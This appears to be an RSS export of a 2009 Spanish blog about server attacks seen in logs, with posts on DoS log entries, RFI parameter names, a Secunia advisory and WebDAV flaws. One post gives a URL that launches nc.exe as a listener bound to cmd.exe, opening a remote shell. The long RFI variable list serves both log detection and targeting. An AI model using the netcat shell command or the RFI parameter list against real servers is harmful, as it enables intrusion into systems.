<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Ataques a servidores</title>
	<atom:link href="http://ataqueservidor.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://ataqueservidor.wordpress.com</link>
	<description>Lo que sucede en los servidores</description>
	<lastBuildDate>Sat, 21 Nov 2009 13:59:21 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='ataqueservidor.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/823f144e9078f35cf1c5b5a4438d29a1?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>Ataques a servidores</title>
		<link>http://ataqueservidor.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://ataqueservidor.wordpress.com/osd.xml" title="Ataques a servidores" />
		<item>
		<title>DoSHTTP</title>
		<link>http://ataqueservidor.wordpress.com/2009/11/21/doshttp/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/11/21/doshttp/#comments</comments>
		<pubDate>Sat, 21 Nov 2009 13:59:21 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Ataque]]></category>
		<category><![CDATA[DoS]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=164</guid>
		<description><![CDATA[Con DoSHTTP se hace una denegación de servicio que podemos ver en los logs del servidor

2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp &#124;14&#124;800a0046&#124;Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -
2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp &#124;14&#124;800a0046&#124;Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=164&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Con DoSHTTP se hace una denegación de servicio que podemos ver en los logs del servidor</p>
<blockquote><p>
2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -<br />
2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -</p></blockquote>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/164/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/164/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/164/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=164&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/11/21/doshttp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>Cadaver parcheado para acceder a fallo WebDav</title>
		<link>http://ataqueservidor.wordpress.com/2009/11/15/cadaver-parcheado-para-acceder-a-fallo-webdav/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/11/15/cadaver-parcheado-para-acceder-a-fallo-webdav/#comments</comments>
		<pubDate>Sun, 15 Nov 2009 21:17:43 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Ataque]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=162</guid>
		<description><![CDATA[cadaver/0.23.2+neon/0.28.0
cadaver/0.23.0+neon/0.28.2
Versiones de Cadaver parcheado para acceder a fallo WebDav
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=162&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>cadaver/0.23.2+neon/0.28.0<br />
cadaver/0.23.0+neon/0.28.2</p>
<p>Versiones de Cadaver parcheado para acceder a fallo WebDav</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/162/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/162/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/162/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/162/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/162/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/162/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/162/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/162/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/162/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/162/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=162&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/11/15/cadaver-parcheado-para-acceder-a-fallo-webdav/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>Acceso de Alexa a los tres días por la barra</title>
		<link>http://ataqueservidor.wordpress.com/2009/11/15/acceso-de-alexa-a-los-tres-dias-por-la-barra/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/11/15/acceso-de-alexa-a-los-tres-dias-por-la-barra/#comments</comments>
		<pubDate>Sun, 15 Nov 2009 21:12:07 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Alexa]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=158</guid>
		<description><![CDATA[2009-11-12	13:53:29	192.168.1.34	GET	/re.asp		404	Mozilla/5.0+(Firefox/3.5.5
2009-11-12	13:53:37	192.168.1.34	GET	/r/re.asp	200	Mozilla/5.0+(Firefox/3.5.5
2009-11-15	19:28:02	192.168.1.34	GET	/re.asp		404	ia_archiver+(+http://www.alexa.com/site/help/webmasters;+crawler@alexa.com)
2009-11-15	19:28:10	192.168.1.34	GET	/re/re.asp	200	ia_archiver+(+http://www.alexa.com/site/help/webmasters;+crawler@alexa.com)	
Alexa recorre las págians gracias a su barra y depués de tres días
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=158&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><strong>2009-11-12	13:53:29</strong>	192.168.1.34	GET	/re.asp		404	Mozilla/5.0+(Firefox/3.5.5<br />
2009-11-12	13:53:37	192.168.1.34	GET	/r/re.asp	200	Mozilla/5.0+(Firefox/3.5.5<br />
<strong>2009-11-15	19:28:02</strong>	192.168.1.34	GET	/re.asp		404	ia_archiver+(+http://www.<strong>alexa</strong>.com/site/help/webmasters;+crawler@alexa.com)<br />
2009-11-15	19:28:10	192.168.1.34	GET	/re/re.asp	200	ia_archiver+(+http://www.alexa.com/site/help/webmasters;+crawler@alexa.com)	</p>
<p>Alexa recorre las págians gracias a su barra y depués de tres días</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/158/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/158/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/158/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=158&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/11/15/acceso-de-alexa-a-los-tres-dias-por-la-barra/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>Variables que se utilizan en los RFI</title>
		<link>http://ataqueservidor.wordpress.com/2009/06/25/variables-que-se-utilizan-en-los-rfi/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/06/25/variables-que-se-utilizan-en-los-rfi/#comments</comments>
		<pubDate>Thu, 25 Jun 2009 13:06:33 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Sentencia sql]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=155</guid>
		<description><![CDATA[Variables que se utilizan en los RFI:
&#38;glob
&#38;glob[rootDir]
AIbasedir
CLPATH
CMS_ADMIN_PAGE
CONFIG[MWCHAT_Libs]
CONFIG[path]
CONFIG_EXT[LANGUAGES_DIR]
CPG_M_DIR
Cat
Config_rootdir
DIR
DIR_LIBS
FM
GALLERY_BASEDIR
GLOBALS['mosConfig_absolute_path']
GLOBALS[AA_INC_PATH]
GLOBALS[CLPath]
GLOBALS[includeBit]
GLOBALS[language_home]
GLOBALS[mosConfig_absolute_path]
GLOBALS[rootdp]
G_PATH
HCL_path
HTTP_POST_VARS
IP
Include
LOCAL_PATH
LangCookie
MAIN_PATH
ME
PATH
PATH_Includes
PGV_BASE_DIRECTORY
PHORUM[settings_dir]
REX[INCLUDE_PATH]
Server
THEME_DIR
VoteBoxPath
[Home]
_AMGconfig[cfg_serverpath]
_AMLconfig[cfg_serverpath]
_AMVconfig[cfg_serverpath]
_CCFG[_PKG_PATH_DBSE]
_PX_config[manager_path]
_REQUEST
_REQUEST[option]
_SERVER[DOCUMENT_ROOT]
a
absolute_path
act
action
addpoll
adminpath
agendax_path
alpath
apa_module_basedir
app_path
appdir
archive
arquivo
azione
b2inc
baccio
base
baseDir
base_dir
base_path
basepath
bbPath
bbPath[path]
bkpwp_plugin_path
boarddir
c
cal_dir
cfgProgDir
chem_absolu
childwindow.inc.php?form
clarolineRepositorySys
classes_dir
client
cmd
cnkey
coID
component_dir
conf
confdir
config
configFile
config[image_module]
config[include_path]
config[path_admin_include]
config[path_src_include]
config[search_disp]
config_atkroot
configbasedir
cont
content
conteudo
cropimagedir
css_path
custom
cutepath
dPconfig[root_dir]
data
dept
dir[base]
dir[func]
do
dsp
emailreader_ini
eqdkp_root_path
error
f
ff_compath
fil_config
file
file_newsportal
filnavn
fromTemplate
from_market
function
g_meta_inc_dir
g_meta_include_file
glob[rootDir]
go
gorumDir
hc
inc
inc_dir
incdir
includeFooter
includePath
include_dir
include_file
include_location
include_path
includedir
includes_dir
inhalt
kietu[url_hit]
kobr
l
lang
language_dir
layerstyle
left
lg
libpach
libpath
lm_absolute_path
lng
logfile
login
lvc_include_dir
m2f_root_path
m
mainpage
match
meio.php
meio
mode
modpath
module_path]
module_root_path
mosConfig_absolute_path
mosConfig_live_site
myPath
name
newsSync_enable_phpnuke_mod
news_file
nic
noSet
no_connect
nphp_config[LangFile]
o
opcao
open
openfile
openid_root_path
option
ort
p
pag
page
pageurl
pagina
path[docroot]
path_local
path_pre
path_to_bt_dir
path_to_news
pathtoashnews
pg
phgdir
phpAds_path
phpEx
phpbb_root_dir
phpbb_root_path
phpc_root_path
pilih
pivot_path
place
pm_path
pollname
prefix
principal
pun_root
quezza_root_path
rage
relative_script_path
rep
req_path
returnpath
root
root_dir
root_path
rootagenda
rub
s
sayfa
sbp
script_root
seccion
sel
serverPath
server_inc
setmodules
settings[locale]
settings_dir
sfx
show
side
site
site_path
siteurl
smf_root_path
sourcedir
spaw_root
sqld
systempath
t
t_core_path
template
theme_path
thisdir
thispath
tpl_pgb_moddir
url
user_inc
val1
visualizar
vsDragonRootPath
vwar_root2
vwar_root
wkPath
wpPATH
x
xcomicRootPath
xoopsConfig[xoops_url]
xoops_redirect
Consulta para sacar las variables:
logparser &#8220;SELECT * FROM &#8216;C:\logs\*&#8217; where [cs-uri-query] like &#8216;%=http%&#8217;&#8221; -i:W3C -o:DATAGRID
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=155&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Variables que se utilizan en los RFI:</p>
<blockquote><p>&amp;glob<br />
&amp;glob[rootDir]<br />
AIbasedir<br />
CLPATH<br />
CMS_ADMIN_PAGE<br />
CONFIG[MWCHAT_Libs]<br />
CONFIG[path]<br />
CONFIG_EXT[LANGUAGES_DIR]<br />
CPG_M_DIR<br />
Cat<br />
Config_rootdir<br />
DIR<br />
DIR_LIBS<br />
FM<br />
GALLERY_BASEDIR<br />
GLOBALS['mosConfig_absolute_path']<br />
GLOBALS[AA_INC_PATH]<br />
GLOBALS[CLPath]<br />
GLOBALS[includeBit]<br />
GLOBALS[language_home]<br />
GLOBALS[mosConfig_absolute_path]<br />
GLOBALS[rootdp]<br />
G_PATH<br />
HCL_path<br />
HTTP_POST_VARS<br />
IP<br />
Include<br />
LOCAL_PATH<br />
LangCookie<br />
MAIN_PATH<br />
ME<br />
PATH<br />
PATH_Includes<br />
PGV_BASE_DIRECTORY<br />
PHORUM[settings_dir]<br />
REX[INCLUDE_PATH]<br />
Server<br />
THEME_DIR<br />
VoteBoxPath<br />
[Home]<br />
_AMGconfig[cfg_serverpath]<br />
_AMLconfig[cfg_serverpath]<br />
_AMVconfig[cfg_serverpath]<br />
_CCFG[_PKG_PATH_DBSE]<br />
_PX_config[manager_path]<br />
_REQUEST<br />
_REQUEST[option]<br />
_SERVER[DOCUMENT_ROOT]<br />
a<br />
absolute_path<br />
act<br />
action<br />
addpoll<br />
adminpath<br />
agendax_path<br />
alpath<br />
apa_module_basedir<br />
app_path<br />
appdir<br />
archive<br />
arquivo<br />
azione<br />
b2inc<br />
baccio<br />
base<br />
baseDir<br />
base_dir<br />
base_path<br />
basepath<br />
bbPath<br />
bbPath[path]<br />
bkpwp_plugin_path<br />
boarddir<br />
c<br />
cal_dir<br />
cfgProgDir<br />
chem_absolu<br />
childwindow.inc.php?form<br />
clarolineRepositorySys<br />
classes_dir<br />
client<br />
cmd<br />
cnkey<br />
coID<br />
component_dir<br />
conf<br />
confdir<br />
config<br />
configFile<br />
config[image_module]<br />
config[include_path]<br />
config[path_admin_include]<br />
config[path_src_include]<br />
config[search_disp]<br />
config_atkroot<br />
configbasedir<br />
cont<br />
content<br />
conteudo<br />
cropimagedir<br />
css_path<br />
custom<br />
cutepath<br />
dPconfig[root_dir]<br />
data<br />
dept<br />
dir[base]<br />
dir[func]<br />
do<br />
dsp<br />
emailreader_ini<br />
eqdkp_root_path<br />
error<br />
f<br />
ff_compath<br />
fil_config<br />
file<br />
file_newsportal<br />
filnavn<br />
fromTemplate<br />
from_market<br />
function<br />
g_meta_inc_dir<br />
g_meta_include_file<br />
glob[rootDir]<br />
go<br />
gorumDir<br />
hc<br />
inc<br />
inc_dir<br />
incdir<br />
includeFooter<br />
includePath<br />
include_dir<br />
include_file<br />
include_location<br />
include_path<br />
includedir<br />
includes_dir<br />
inhalt<br />
kietu[url_hit]<br />
kobr<br />
l<br />
lang<br />
language_dir<br />
layerstyle<br />
left<br />
lg<br />
libpach<br />
libpath<br />
lm_absolute_path<br />
lng<br />
logfile<br />
login<br />
lvc_include_dir<br />
m2f_root_path<br />
m<br />
mainpage<br />
match<br />
meio.php<br />
meio<br />
mode<br />
modpath<br />
module_path]<br />
module_root_path<br />
mosConfig_absolute_path<br />
mosConfig_live_site<br />
myPath<br />
name<br />
newsSync_enable_phpnuke_mod<br />
news_file<br />
nic<br />
noSet<br />
no_connect<br />
nphp_config[LangFile]<br />
o<br />
opcao<br />
open<br />
openfile<br />
openid_root_path<br />
option<br />
ort<br />
p<br />
pag<br />
page<br />
pageurl<br />
pagina<br />
path[docroot]<br />
path_local<br />
path_pre<br />
path_to_bt_dir<br />
path_to_news<br />
pathtoashnews<br />
pg<br />
phgdir<br />
phpAds_path<br />
phpEx<br />
phpbb_root_dir<br />
phpbb_root_path<br />
phpc_root_path<br />
pilih<br />
pivot_path<br />
place<br />
pm_path<br />
pollname<br />
prefix<br />
principal<br />
pun_root<br />
quezza_root_path<br />
rage<br />
relative_script_path<br />
rep<br />
req_path<br />
returnpath<br />
root<br />
root_dir<br />
root_path<br />
rootagenda<br />
rub<br />
s<br />
sayfa<br />
sbp<br />
script_root<br />
seccion<br />
sel<br />
serverPath<br />
server_inc<br />
setmodules<br />
settings[locale]<br />
settings_dir<br />
sfx<br />
show<br />
side<br />
site<br />
site_path<br />
siteurl<br />
smf_root_path<br />
sourcedir<br />
spaw_root<br />
sqld<br />
systempath<br />
t<br />
t_core_path<br />
template<br />
theme_path<br />
thisdir<br />
thispath<br />
tpl_pgb_moddir<br />
url<br />
user_inc<br />
val1<br />
visualizar<br />
vsDragonRootPath<br />
vwar_root2<br />
vwar_root<br />
wkPath<br />
wpPATH<br />
x<br />
xcomicRootPath<br />
xoopsConfig[xoops_url]<br />
xoops_redirect</p></blockquote>
<p>Consulta para sacar las variables:</p>
<blockquote><p>logparser &#8220;SELECT * FROM &#8216;C:\logs\*&#8217; where [cs-uri-query] like &#8216;%=http%&#8217;&#8221; -i:W3C -o:DATAGRID</p></blockquote>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/155/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/155/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/155/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=155&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/06/25/variables-que-se-utilizan-en-los-rfi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>Ejecutar nc.exe + cmd.exe remotamente</title>
		<link>http://ataqueservidor.wordpress.com/2009/06/06/ejecutar-nc-exe-cmd-exe-remotamente/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/06/06/ejecutar-nc-exe-cmd-exe-remotamente/#comments</comments>
		<pubDate>Sat, 06 Jun 2009 14:00:13 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Logs]]></category>
		<category><![CDATA[NC]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=153</guid>
		<description><![CDATA[Para poder ejecutar remotamente nc.exe, introducimos esta cadena en la dirección url:
http://192.168.1.33/cg/nc.exe?-L -p 82 -e CMD.exe
Entrada en el log:
GET /cg/nc.exe -L%20-p%2082%20-e%20CMD.exe
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=153&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Para poder ejecutar remotamente nc.exe, introducimos esta cadena en la dirección url:</p>
<blockquote><p>http://192.168.1.33/cg/nc.exe?-L -p 82 -e CMD.exe</p></blockquote>
<p>Entrada en el log:</p>
<blockquote><p>GET /cg/nc.exe -L%20-p%2082%20-e%20CMD.exe</p></blockquote>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/153/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/153/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/153/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/153/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/153/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/153/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/153/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/153/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/153/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/153/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=153&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/06/06/ejecutar-nc-exe-cmd-exe-remotamente/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>Ping de la vida</title>
		<link>http://ataqueservidor.wordpress.com/2009/06/02/ping-de-la-vida/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/06/02/ping-de-la-vida/#comments</comments>
		<pubDate>Tue, 02 Jun 2009 11:58:27 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Ping]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=151</guid>
		<description><![CDATA[El ping de la muerte consiste en mandar paquetes ICMP de gran tamaño. Existe otro tipo de ping muy dañino para el bolsillo, si enviamos paquetes menores de 65.535 bytes a un servidor que tarifica por bytes, ¿qué sucede?, que podemos estar cobrando a los clientes de esos servidores por un tráfico que no realizan.
 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=151&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>El ping de la muerte consiste en mandar paquetes ICMP de gran tamaño. Existe otro tipo de ping muy dañino para el bolsillo, si enviamos paquetes menores de 65.535 bytes a un servidor que tarifica por bytes, ¿qué sucede?, que podemos estar cobrando a los clientes de esos servidores por un tráfico que no realizan.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/151/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/151/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/151/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=151&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ataqueservidor.wordpress.com/2009/06/02/ping-de-la-vida/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">ataqueservidor</media:title>
		</media:content>
	</item>
		<item>
		<title>&#8220;systempath&#8221;</title>
		<link>http://ataqueservidor.wordpress.com/2009/06/01/systempath/</link>
		<comments>http://ataqueservidor.wordpress.com/2009/06/01/systempath/#comments</comments>
		<pubDate>Mon, 01 Jun 2009 10:19:09 +0000</pubDate>
		<dc:creator>ataqueservidor</dc:creator>
				<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://ataqueservidor.wordpress.com/?p=149</guid>
		<description><![CDATA[Input passed to the &#8220;systempath&#8221; parameter in ImpExData.php, ImpExModule.php, ImpExController.php, and ImpExDisplay.php isn&#8217;t properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.
Source: http://secunia.com/advisories/19352/
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=149&subd=ataqueservidor&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Input passed to the &#8220;systempath&#8221; parameter in ImpExData.php, ImpExModule.php, ImpExController.php, and ImpExDisplay.php isn&#8217;t properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.</p>
<p>Source: <a href="http://secunia.com/advisories/19352/">http://secunia.com/advisories/19352/</a></p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ataqueservidor.wordpress.com/149/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ataqueservidor.wordpress.com/149/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ataqueservidor.wordpress.com/149/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ataqueservidor.wordpress.com/149/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ataqueservidor.wordpress.com/149/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ataqueservidor.wordpress.com/149/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ataqueservidor.wordpress.com/149/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ataqueservidor.wordpress.com/149/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ataqueservidor.wordpress.com/149/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ataqueservidor.wordpress.com/149/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ataqueservidor.wordpress.com&blog=7565012&post=149&subd=ataqueservidor&ref=&feed=1" /></div>]]></content:encoded>
